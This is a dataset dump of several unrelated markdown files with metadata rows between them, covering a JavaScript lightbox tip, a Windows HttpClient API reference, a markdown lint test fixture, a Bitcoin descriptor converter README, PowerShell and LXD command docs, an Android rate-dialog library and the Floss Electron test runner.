baguetteBox.run('.grid', {}); > ``` > ## Trivia > ### Q: _Why do I abandoned href to trigger double click?_ > ### A: _Because if href was still applied to `<a>` tag, it will still trigger its default behaviors(like jump to another page, fly to an anchor and so on) every time even if user double clicked it. But you know `<a>` tag can respond to click event, too, that's why I recommend to remove the `href` for every `<a>` tags that will open baguetteBox by double clicking._ > ### __[Tip]__: Do not use `dblHref` and `href` at the same time when you enabled double trigger feature, if you insist to use `href`, set its value to `javascript:void(0)`. > ## For a complete example of my modification, see this [double click demo file](/demo/doubleClickExample.html) for detail.
55.8125
368
0.680403
eng_Latn
0.977221
6f66d156dc2f2209426ec7576edc69d8f16835e3
1,380
md
Markdown
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.web.http/httpclient_trygetinputstreamasync_434735070.md
embender/winrt-api
c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- -api-id: M:Windows.Web.Http.HttpClient.TryGetInputStreamAsync(Windows.Foundation.Uri) -api-type: winrt method ms.custom: 19H1 --- <!-- Method syntax. public IAsyncOperationWithProgress<HttpProgress> HttpClient.TryGetInputStreamAsync(Uri uri) --> # Windows.Web.Http.HttpClient.TryGetInputStreamAsync ## -description Send a GET request to the specified [Uri](../windows.foundation/uri.md) and return the response body as a stream in an asynchronous operation. For programming guidance for the [HttpClient class](/uwp/api/windows.web.http.httpclient), and code examples, see the [HttpClient](/windows/uwp/networking/httpclient) conceptual topic. ## -parameters ### -param uri The Uri the request is sent to. ## -returns The object representing the asynchronous operation. ## -remarks This operation will not block. The returned [IAsyncOperationWithProgress(HttpGetInputStreamResult, HttpProgress)](../windows.foundation/iasyncoperationwithprogress_2.md) object will complete after the whole response body is read. This method does not buffer the stream, so this method can support long streams of arbitrary length. ## -see-also [HttpGetInputStreamResult](httpgetinputstreamresult.md), [HttpProgress](httpprogress.md), [IInputStream](../windows.storage.streams/iinputstream.md), [HttpClient](/windows/uwp/networking/httpclient) ## -examples
44.516129
331
0.776812
eng_Latn
0.769461
6f67160afdf79478169b92b0568d18df54541e39
557
md
Markdown
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
4
2021-01-14T11:08:00.000Z
2021-11-23T23:17:35.000Z
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
12
2021-01-13T16:34:14.000Z
2022-01-31T00:02:32.000Z
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
1
2021-04-05T04:54:05.000Z
2021-04-05T04:54:05.000Z
## Bad Markdown This is just standard good markdown. ###### Second level header This header does **NOT** follow the __step__ down from `level 1`. - Here it *is* - Some more indention - why so much? ``` ls -la ``` | this | is a wrong | table | | ---------------| -----------| -----------| | hahaha | naaaaaaah | wrong formatting ! | | hahaha | naaaaaaah | wrong formatting ! | # Walk away We're all done **here**. - [Link Action]https://github.com - [Link Action 2](#wesh) - [Link Action 3](http://www.glouglouglglsdgdfgfdgsfgdfgdf.com)
20.62963
65
0.597846
eng_Latn
0.790116
6f6739d98230986f9085d9b6803b95ab4cf910fc
2,045
md
Markdown
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
# electrum2descriptors [![crates.io](https://img.shields.io/crates/v/electrum2descriptors.svg)](https://crates.io/crates/electrum2descriptors) Converts [slip-0132](https://github.com/satoshilabs/slips/blob/master/slip-0132.md) extended keys (like the vpub, ypub, yprv, etc. used by Electrum) into [output descriptors](https://github.com/bitcoin/bitcoin/blob/master/doc/descriptors.md) This project consists of a library and an executable. The work of @ulrichard in this project was sponsored by [SEBA Bank AG](https://seba.swiss) ## Usage library For the library interface read [the docs](https://docs.rs/electrum2descriptors/latest/libelectrum2descriptors/). With the library, you can also convert from descriptor to slip-0132 and to electrum wallet files. ## Usage binary ``` $ cargo install electrum2descriptors $ electrum2descriptors vpub5VXaSncXqxLbdmvrC4Y8z9CszPwuEscADoetWhfrxDFzPUbL5nbVtanYDkrVEutkv9n5A5aCcvRC9swbjDKgHjCZ2tAeae8VsBuPbS8KpXv ["wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/0/*)", "wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/1/*)"] ``` or ``` git clone https://github.com/RCasatta/electrum2descriptors cd electrum2descriptors cargo run -- vpub5VXaSncXqxLbdmvrC4Y8z9CszPwuEscADoetWhfrxDFzPUbL5nbVtanYDkrVEutkv9n5A5aCcvRC9swbjDKgHjCZ2tAeae8VsBuPbS8KpXv ["wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/0/*)", "wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/1/*)"] ``` can also convert electrum wallet files to descriptors ``` $ cargo run -- tests/wallets/default_segwit ["wpkh(tprv8cvkZzx9zA7EfFDbH945mK23r7hg6EHXUk79wVUSRukwyctFS1AdpSpkZcykAMDveCj8RA3R4jwFTKMwMbWexJox8NMqq7YphJLDumfCSfu/0/*)", "wpkh(tprv8cvkZzx9zA7EfFDbH945mK23r7hg6EHXUk79wVUSRukwyctFS1AdpSpkZcykAMDveCj8RA3R4jwFTKMwMbWexJox8NMqq7YphJLDumfCSfu/1/*)"] ```
53.815789
250
0.852323
yue_Hant
0.408884
6f67713feb465230c51e476040db4b2860b650c6
4,462
md
Markdown
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
2
2016-03-08T06:52:43.000Z
2019-01-16T06:04:51.000Z
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
null
null
null
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
1
2021-04-05T00:12:43.000Z
2021-04-05T00:12:43.000Z
# Get-InstalledModule 取得は、コンピューターにモジュールをインストールします。 ## 説明 Get InstalledModule コマンドレットは、インストール モジュールのコマンドレットを使用してインストールされたコンピューターにインストールされている PowerShell モジュールを取得します。 各インストールされているモジュールは、Get InstalledModule は、インストールされているモジュールをアンインストールするため、アンインストール モジュールに必要に応じてパイプすることもできる PSRepositoryItemInfo オブジェクトを返します。 - Get InstalledModule は、インストールされているモジュールの名前、バージョン パラメーターに基づいてフィルター処理できます。 - Get InstalledModule がバージョン パラメーターを使用してフィルター処理できます。 MinimumVersion、MaximumVersion、RequiredVersion、AllVersions です。 - これらのパラメーターは MinmimumVersion と MaximumVersion を除く、相互に排他的です。 - これらのバージョン パラメーターは、任意のワイルドカードを含まない 1 つのモジュール名のみで許可されます。 - RequiredVersion パラメーターが指定されていない場合、Get InstalledModule は最低限のバージョンが指定されていない場合、同じかまたは指定された最小のバージョンや、モジュールの最新のバージョンよりも大きいはインストールされたモジュールの最新バージョンを返します。 - RequiredVersion パラメーターが指定されている場合、指定したバージョンを完全に一致するインストール済みのモジュールのバージョンは Get InstalledModule だけを返します。 ## コマンドレット構文 ```powershell Get-Command -Name Get-InstalledModule -Module PowerShellGet -Syntax ``` ## コマンドレットのオンライン ヘルプ リファレンス [Get InstalledModule](http://go.microsoft.com/fwlink/?LinkId=526863) ## コマンド例 ```powershell # Get all modules installed using PowerShellGet cmdlets Get-InstalledModule # Get a specific installed module Get-InstalledModule DJoin Version Name Repository Description ------- ---- ---------- ----------- 1.0 DJoin PSGallery This is a PowerShell frontend to the DJOIN.exe c... # Get installed module with wildcards Get-InstalledModule -Name AzureRM* # Get all versions of an installed module Get-InstalledModule -Name AzureRM.Automation -AllVersions # Get installed module with MinimumVersion Get-InstalledModule -Name AzureRM.Automation -MinimumVersion 1.0.0 # Get installed module with MaximumVersion Get-InstalledModule -Name AzureRM.Automation -MaximumVersion 1.0.8 # Get installed module with version range Get-InstalledModule -Name AzureRM.Automation -MinimumVersion 1.0.0 -MaximumVersion 1.0.8 # Get installed module with RequiredVersion Get-InstalledScript -Name AzureRM.Automation -RequiredVersion 1.0.3 # Properties of Get-InstalledModule returned object Get-InstalledModule DJoin | Format-List * -Force Name : DJoin Version : 1.0 Type : Module Description : This is a PowerShell frontend to the DJOIN.exe command which provides better discoverability and usability. Author : Jeffrey Snover CompanyName : jsnover Copyright : (C) Microsoft Corporation. All rights reserved. PublishedDate : 2/15/2016 7:12:37 PM InstalledDate : 4/5/2016 4:13:39 PM UpdatedDate : LicenseUri : ProjectUri : IconUri : Tags : {Nano, PSModule} Includes : {Function, RoleCapability, Command, DscResource...} PowerShellGetFormatVersion : ReleaseNotes : Dependencies : {} RepositorySourceLocation : https://www.powershellgallery.com/api/v2/ Repository : PSGallery PackageManagementProvider : NuGet AdditionalMetadata : {description, installeddate, tags, PackageManagementProvider...} InstalledLocation : C:\Program Files\WindowsPowerShell\Modules\DJoin\1.0 ``` ## PSGetRepositoryItemInfo オブジェクトで InstalledDate と UpdatedDate プロパティ During the install operation: InstalledDate: current DateTime (Get-Date) value UpdatedDate: null During the Update operation: InstalledDate: InstalledDate from the previous installation otherwise current DateTime (Get-Date) value UpdatedDate: current DateTime (Get-Date) value ```powershell Install-Module -Name ContosoServer -RequiredVersion 1.0 -Repository INT Get-InstalledModule -Name ContosoServer | Format-Table Name, InstalledDate, UpdatedDate Name InstalledDate UpdatedDate ---- ------------- ----------- ContosoServer 2/29/2016 11:59:14 AM \Update-Module -Name ContosoServer Get-InstalledModule -Name ContosoServer | Format-Table Name, InstalledDate, UpdatedDate Name InstalledDate UpdatedDate ---- ------------- ----------- ContosoServer 2/29/2016 11:59:14 AM 2/29/2016 12:00:15 PM ``` <!--HONumber=Oct16_HO1-->
36.876033
151
0.692963
yue_Hant
0.579129
6f677ce6dd5c203c4a95d980ba1798336bca1fc0
1,204
md
Markdown
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
1
2020-05-04T08:50:45.000Z
2020-05-04T08:50:45.000Z
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
null
null
null
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
null
null
null
# `nikita.lxd.file.exists` Push files into containers. ## Options * `container` (string, required) The name of the container. * `target` (string, required) File destination in the form of "<path>". overwrite the `target` option. ## Example ```js require('nikita') .lxd.file.exists({ container: "my_container" }, function(err, {status}) { console.info( err ? err.message : 'The container was deleted') }); ``` ## Todo * Push recursive directories * Handle unmatched target permissions * Handle unmatched target ownerships * Detect name from lxd_target ## Source Code module.exports = shy: true, handler: ({options}) -> @log message: "Entering lxd.file.exists", level: 'DEBUG', module: '@nikitajs/lxd/lib/file/exists' # Validation throw Error "Invalid Option: container is required" unless options.container validate_container_name options.container throw Error "Invalid Option: target is required" unless options.target @system.execute cmd: """ lxc exec #{options.container} -- stat #{options.target} """ code_skipped: 1 ## Dependencies validate_container_name = require '../misc/validate_container_name'
24.08
103
0.685216
eng_Latn
0.737097
6f67bd57a01e8e58bcf060e1c86a209f16a2998a
143
md
Markdown
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
2
2022-03-13T09:54:10.000Z
2022-03-13T10:07:04.000Z
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
null
null
null
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
null
null
null
# CustomizableLuaSettings Wanna know what's this? Basically a cool mod I'm working on :cool: Download here: https://gamebanana.com/mods/358754
47.666667
116
0.79021
eng_Latn
0.885797
6f688a1e13d7f4341b1e9652c59bd3a9c638caf1
6,690
md
Markdown
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
39
2020-04-28T03:31:21.000Z
2022-03-21T12:13:28.000Z
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
3
2020-05-11T07:22:21.000Z
2020-08-04T04:36:50.000Z
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
4
2020-04-17T07:06:57.000Z
2022-03-21T12:13:29.000Z
KyogenRV(響玄RV):The Simple RISC-V for intel FPGA = ## 日本語のREADMEは[こちら](README_J.md) - Arch:RV32I - Privilege : only M-mode - User-Level ISA Version 2.2 - Privileged ISA Version 1.11 - Interrupt:External - CPU Bus: Intel Avalon-MM Interface - Pipelines: 5-stage(IF/ID/EX/MEM/WB) - Written: in Chisel-lang v.3.4 + Makefile ## I.Usage #### 0.using with intel FPGA The standard environment assumption is using Cyclone10LP(10CL025YU256C8G). ##### Recommended development environment - Cross development environment: Environment that satisfies all of the following conditions - An environment running Windows 10/WSL2 - Running Quartus Prime Lite v.20.1.1 or higher - A scala/sbt environment must be available. - Pyhton 3.7 or higher is required. - FPGA requirements: Devices that satisfied one of the following requirements - Cyclone 10LP (device with 10CL010 or more logic elements) - An intel FPGA with at least 1-block PLL, at least 7000 LEs of logic elements, and at least 1-KiB of On-Chip RAM ##### Preparing the riscv-toolchain ``` git clone https://github.com/riscv/riscv-gnu-toolchain cd riscv-gnu-toolchain ./configure --prefix=/opt/riscv --with-arch=rv32i sudo make ``` ##### Install KyogenRV and rebuild FPGA logic related ``` cd - git clone http://github.com/panda5mt/KyogenRV cd KyogenRV/ make sdk ``` ##### Starting Quartus Prime You can choose between GUI or CUI, the CUI method is useful when using a cloud or on-premises Windows PC. ###### Compiling with GUI Run Quartus Prime and open the <code>[fpga/kyogenrv_fpga_top.qpf](fpga/kyogenrv_fpga_top.qpf)</code> project. Menu -> Processing -> Start Compilation to start compilation. ###### Compiling with CUI Open the build script <code>[build_sdk.sh](build_sdk.sh)</code> with an editor and set the Quartus Prime installation folder, KyogenRV directory, etc. After confirming that everything PATH is correct, just run the following at the root of the project. ``` ./build_sdk.sh ``` Regardless of which method CUI or GUI you use above, make sure that there are no build errors before modifying the project to fit your board environment using Pin Planner or Platform Designer. The following files will be generated in the <code>[fpga](fpga)</code> folder. - kyogenrv_fpga_top.sof If you use CUI, the following file will also be generated. - kyogenrv_fpga_top.svf ##### Modify the sample code(led.c as exam) You may find it helpful to know how does this RISC-V CPU and its project works to modify <code>[src/sw/main.c](src/sw/main.c)</code>. If the code consists of multiple files or the file names are changed, please rewrite <code>[src/sw/common2.mk](src/sw/common2.mk)</code> to Makefile build all fixed and modified files. ##### Rebuild the project ###### Rebuild with GUI After saving the file, run ``` make c_all ./mk_intel_hex.py ``` to compile project and re-generate the intel hex files. If you are build all FPGA project, you can run, ``` make sdk ``` Start compiling by going to Menu -> Processing -> Start Compilation. The generated *.sof file is used to configure the FPGA via Quartus Programmer. ###### Rebuild with CUI Compared with GUI, the procedure is simple. just run following to rebuild. ``` ./build_sdk.sh ``` Configure the FPGA using *.sof or *.svf. ## The following is the procedure for PC-based simulation; it is not necessary when using the FPGA hardware. ## ## #### 1.Simulation ``` git clone http://github.com/panda5mt/KyogenRV cd KyogenRV/ make clean make test ``` to generate your *.hex files from your *.s, put your *.s file to <code>[src/sw/](src/sw)</code> and then execute below ``` ./build_asm.py # generate *.hex file from *.s ./mk_intel_hex.py # generate intel hex files ``` #### 2.Simulating with riscv-tests (need python 3.7 or later) ``` git clone http://github.com/panda5mt/KyogenRV ``` clone from riscv-tests ``` git clone https://github.com/riscv/riscv-tests cd riscv-tests git submodule update --init --recursive ``` then modify linker script ``` nano env/p/link.ld ``` change start address of '.text' section to start 0x00000000 ``` SECTIONS { . = 0x00000000; # -> change this .text.init : { *(.text.init) } . = ALIGN(0x1000); .tohost : { *(.tohost) } . = ALIGN(0x1000); .text : { *(.text) } . = ALIGN(0x1000); .data : { *(.data) } .bss : { *(.bss) } _end = .; } ``` save link.ld and make riscv-tests ``` autoconf ./configure --prefix=<your-kyogenRVs-root-dir>/tests/ make make install cd ../ ``` ``` cd KyogenRV/ make clean make riscv-tests ``` #### 3.Generate Verilog ``` git clone http://github.com/panda5mt/KyogenRV cd KyogenRV/ make clean make hdl ``` ## ## II.Basically Logic ##### The following instructions is written for who want to explore this "KyogenRV" RV32I design step by step. Otherwise, please clone the latest from GitHub. #### 1.Instruction Fetch Stage(IF) ``` git clone http://github.com/panda5mt/KyogenRV -b 0.0.2 --depth 1 cd KyogenRV/ make test ``` #### 2.Instruction Decode Stage(ID) and Integer ALU ``` git clone http://github.com/panda5mt/KyogenRV -b 0.0.9 --depth 1 cd KyogenRV/ make test ``` #### 3.Branch (PC update) ``` git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.3 --depth 1 cd KyogenRV/ ``` write asm file and save to <code>[src/sw/test.s](src/sw/test.s)</code> then build as follows ``` make asm ``` you'll get <code>[src/sw/test.hex](src/sw/test.hex)</code> then build test module in chisel project as follows ``` make test ``` #### 4.Multi-staged pipeline (5-staged-pipeline) ``` git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.10 --depth 1 cd KyogenRV/ ``` write asm file and save to <code>[src/sw/test.s](src/sw/test.s)</code> then build as follows ``` make clean make asm ``` you'll get <code>[src/sw/test.hex](src/sw/test.hex)</code> then build test module in chisel project as follows ``` make test ``` when you modified <code>[src/sw/test.s](src/sw/test.s)</code>, just type as follows ``` make test ``` so makefile scan test.hex is changed and re-assemble then build chisel project. #### 5. Added Stage-Stall and Stage-fowardings ``` git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.15 --depth 1 cd KyogenRV/ ``` write asm file and save to <code>[src/sw/test.s](src/sw/test.s)</code> then build as follows ``` make clean make asm ``` you'll get <code>[src/sw/test.hex](src/sw/test.hex)</code> then build test module in chisel project as follows ``` make test ``` when you modified <code>[src/sw/test.hex](src/sw/test.hex)</code>, just type as follows ``` make test ``` so makefile scan test.hex is changed and re-assemble then build chisel project. #### 6. Added Exception and External Interrupt please git clone latest one.
28.347458
192
0.713004
eng_Latn
0.946402
6f6892f8180cb35cb04ae75f14c8aa7a42f35278
4,343
md
Markdown
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
1
2021-04-25T08:45:18.000Z
2021-04-25T08:45:18.000Z
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
null
null
null
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
null
null
null
Android-RateThisApp =================== [![Build Status](https://circleci.com/gh/kobakei/Android-RateThisApp.svg?style=shield)](https://circleci.com/gh/kobakei/Android-RateThisApp/tree/master) [ ![Download](https://api.bintray.com/packages/kobakei/maven/ratethisapp/images/download.svg) ](https://bintray.com/kobakei/maven/ratethisapp/_latestVersion) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Android--RateThisApp-green.svg?style=true)](https://android-arsenal.com/details/1/2893) Android-RateThisApp is an library to show "Rate this app" dialog. ![Screen shot](https://raw.github.com/kobakei/Android-RateThisApp/master/screenshot_resized.png) The library monitors the following status * How many times is the app launched * How long days does it take from the app installation and show a dialog to engage users to rate the app in Google Play. ## Getting Started ### Dependency ```groovy dependencies { compile 'io.github.kobakei:ratethisapp:x.y.z' } ``` x.y.z is [ ![Download](https://api.bintray.com/packages/kobakei/maven/ratethisapp/images/download.svg) ](https://bintray.com/kobakei/maven/ratethisapp/_latestVersion) **NOTICE**: From 1.0.0, group ID has been changed from `com.kobakei` to `io.github.kobakei`. ### Basic usage Call `RateThisApp.onStart(Context)` and `RateThisApp.showRateDialogIfNeeded(Context)` in your launcher activity's onStart() method. ```java @Override protected void onStart() { super.onStart(); // Monitor launch times and interval from installation RateThisApp.onStart(this); // If the criteria is satisfied, "Rate this app" dialog will be shown RateThisApp.showRateDialogIfNeeded(this); } ``` ### Custom criteria The default criteria to show the dialog is as below: * App is launched more than 10 times * App is launched more than 7 days later than installation. If you want to use your own criteria, please call `RateThisApp.init(Configuration)` in your Application or launcher activity onCreate method. ```java // Custom criteria: 3 days and 5 launches RateThisApp.Config config = new RateThisApp.Config(3, 5); RateThisApp.init(config); ``` ### Custom strings You can override title, message and button labels. ```java RateThisApp.Config config = new RateThisApp.Config(); config.setTitle(R.string.my_own_title); config.setMessage(R.string.my_own_message); config.setYesButtonText(R.string.my_own_rate); config.setNoButtonText(R.string.my_own_thanks); config.setCancelButtonText(R.string.my_own_cancel); RateThisApp.init(config); ``` ### Custom url In default, rate button navigates to the application page on Google Play. You can override this url as below. ```java RateThisApp.Config config = new RateThisApp.Config(); config.setUrl("http://www.example.com"); RateThisApp.init(config); ``` ### Opt out from your code If you want to stop showing the rate dialog, use this method in your code. ```java RateThisApp.stopRateDialog(this); ``` ### Callback You can receive yes/no/cancel button click events. ```java RateThisApp.setCallback(new RateThisApp.Callback() { @Override public void onYesClicked() { Toast.makeText(MainActivity.this, "Yes event", Toast.LENGTH_SHORT).show(); } @Override public void onNoClicked() { Toast.makeText(MainActivity.this, "No event", Toast.LENGTH_SHORT).show(); } @Override public void onCancelClicked() { Toast.makeText(MainActivity.this, "Cancel event", Toast.LENGTH_SHORT).show(); } }); ``` ## Contribute this project If you want to contribute this project, please send pull request. In present, I need contributors who can translate resources from English/Japanese into other languages. ## License ``` Copyright 2013-2016 Keisuke Kobayashi Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ``` ## Author Keisuke Kobayashi - k.kobayashi.122@gmail.com
29.951724
166
0.750863
eng_Latn
0.68477
6f689ed11887e2ead94da39a58ee8ed3bafeb3c4
744
md
Markdown
CHANGELOG.md
spypunk/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
8
2016-09-29T06:10:06.000Z
2022-01-24T21:33:23.000Z
CHANGELOG.md
coolpup/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
null
null
null
CHANGELOG.md
coolpup/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
6
2017-07-12T18:00:17.000Z
2022-01-24T21:33:24.000Z
# Change Log All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](http://keepachangelog.com/) and this project adheres to [Semantic Versioning](http://semver.org/). ## [1.7.0] - 2017-08-11 - Rendering optimizations and refactoring ## [1.6.0] - 2017-08-09 - Optimizations and refactoring ## [1.5.0] - 2017-08-07 - Optimizations and refactoring ## [1.4.0] - 2017-08-01 - Optimizations and refactoring - Code of conduct added ## [1.3.0] - 2017-07-31 - Optimizations and a lot of refactoring ## [1.2.0] - 2016-09-28 - Statistics added ## [1.1.0] - 2016-09-26 - Bonus food added ## [1.0.0] - 2016-09-18 - First stable release ## [0.1.0] - 2016-09-14 - First beta release
17.302326
140
0.674731
eng_Latn
0.919297
6f691fc7336b41787a5a05448be868e3256fd675
4,808
md
Markdown
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
20
2017-07-07T20:05:49.000Z
2022-01-14T20:17:55.000Z
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
22
2017-06-12T15:27:54.000Z
2022-03-25T18:25:55.000Z
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
4
2018-04-30T16:27:18.000Z
2021-12-11T21:22:11.000Z
# Floss Unit-testing for those hard to reach places. [![Node.js CI](https://github.com/pixijs/floss/workflows/Node.js%20CI/badge.svg)](https://github.com/pixijs/floss/actions?query=workflow%3A%22Node.js+CI%22) [![npm version](https://badge.fury.io/js/floss.svg)](https://badge.fury.io/js/floss) Uses Electron to provide a Mocha unit-testing environment which can be run headlessly or to debugged with DevTools. This was largely inspired by the [electron-mocha](https://github.com/jprichardson/electron-mocha) and [mocha-electron](https://github.com/tscanlin/mochatron) projects but didn't quite have the debugging features needed to develop tests. ## Installation Install globally: ```bash npm install -g floss electron ``` Install locally within a project: ```bash npm install floss electron --save-dev ``` ### Debug Mode Open tests in an Electron window where test can can be debugged with `debugger` and dev tools. ```js await floss({ path: 'test/*.js', debug: true }); ``` ### Mocha Reporter The `reporter` and `reporterOptions` are pass-through options for Mocha to specify a different reporter when running Floss in non-debug mode. ```js await floss({ path: 'test/*.js', reporter: 'xunit', reporterOptions: { filename: 'report.xml' } }); ``` ### Custom Options Additional properties can be passed to the test code by adding more values to the run options. ```js await floss({ path: 'test/*.js', customUrl: 'http://localhost:8080' // <- custom }); ``` The test code and use the global `options` property to have access to the run options. ```js console.log(options.customUrl); // logs: http://localhost:8080 ``` ### Electron Arguments Commandline arguments can be passed to Electron directly by using `args`. In the example below, you may wan to disable Electron's user-gesture policy if you are testing HTML video or audio playback. ```js await floss({ path: 'test/index.js', args: ['--autoplay-policy=no-user-gesture-required'] }); ``` ## Command Line Usage ### Arguments * **--path** or **-p** (String) Path to the file to test * **--debug** or **-d** (Boolean) Enable to run in headful mode, default `false`. * **--quiet** or **-q** (Boolean) Prevent console[log/info/error/warn/dir] messages from appearing in `stdout`. * **--electron** or **-e** (String) Path to the electron to use. * **--reporter** or **-R** (String) Mocha reporter type, default `spec`. * **--reporterOptions** or **-O** (String) Mocha reporter options. * **--require** or **-r** (String) Module to require (e.g., `ts-node/register`). * **-- [args]** Additional arguments can be passed to Electron after `--` ### Usage Command Line usage when installed globally: ```bash floss --path "test/*.js" ``` Or installed locally: ```bash node node_modules/.bin/floss --path "test/*.js" ``` Alernatively, within the **package.json**'s' scripts: ```json { "scripts": { "test": "floss --path \"test/*.js\"" } } ``` ### Debug Mode Open tests in an Electron window where test can can be debugged with `debugger` and dev tools. ```bash floss --path "test/*.js" --debug ``` ### Using TypeScript Support can easily be added for writing tests in TypeScript using [ts-node](https://www.npmjs.com/package/ts-node). ```bash floss --path "test/*.ts" --require ts-node/register ``` ### Istanbul Code Coverage Floss supports `nyc`. To use it, just use floss as you would mocha: ```bash nyc floss --path "test/*.js" ``` ### Mocha Reporter Can use the same reporter options as the API mentioned above. The `reporterOptions` are expressed as a querystring, for instance `varname=foo&another=bar`. ```bash floss --path "test/*.js" \ --reporter=xunit \ --reporterOptions output=report.xml ``` ### Electron Arguments Supports passing additional arguments to Electron after `--`. ```bash floss --path "test/*.js" -- --autoplay-policy=no-user-gesture-required ``` ## Custom Electron Version Some application may require a specific version of Electron. Floss uses Electron 10.0.0+, but you can specific the path to your own version. The custom version can be used either through the commandline argument `--electron`, by setting the Node environmental variable `ELECTRON_PATH` or by setting the run option `electron`. ```bash floss --path "test/.js" \ --electron /usr/local/bin/electron ``` ```bash ELECTRON_PATH=/usr/local/bin/electron floss --path "test/*.js" ``` ## GitHub Actions Integration ```yml name: Node.js CI on: push: branches: [ '**' ] tags: [ '**' ] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - uses: actions/setup-node@v1 with: node-version: '12' - run: npm install - uses: GabrielBB/xvfb-action@v1.0 with: run: npm test ```
25.439153
352
0.681988
eng_Latn
0.912317
6f695fd3d50318f0ee141c37631092355624fa45
21,153
md
Markdown
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
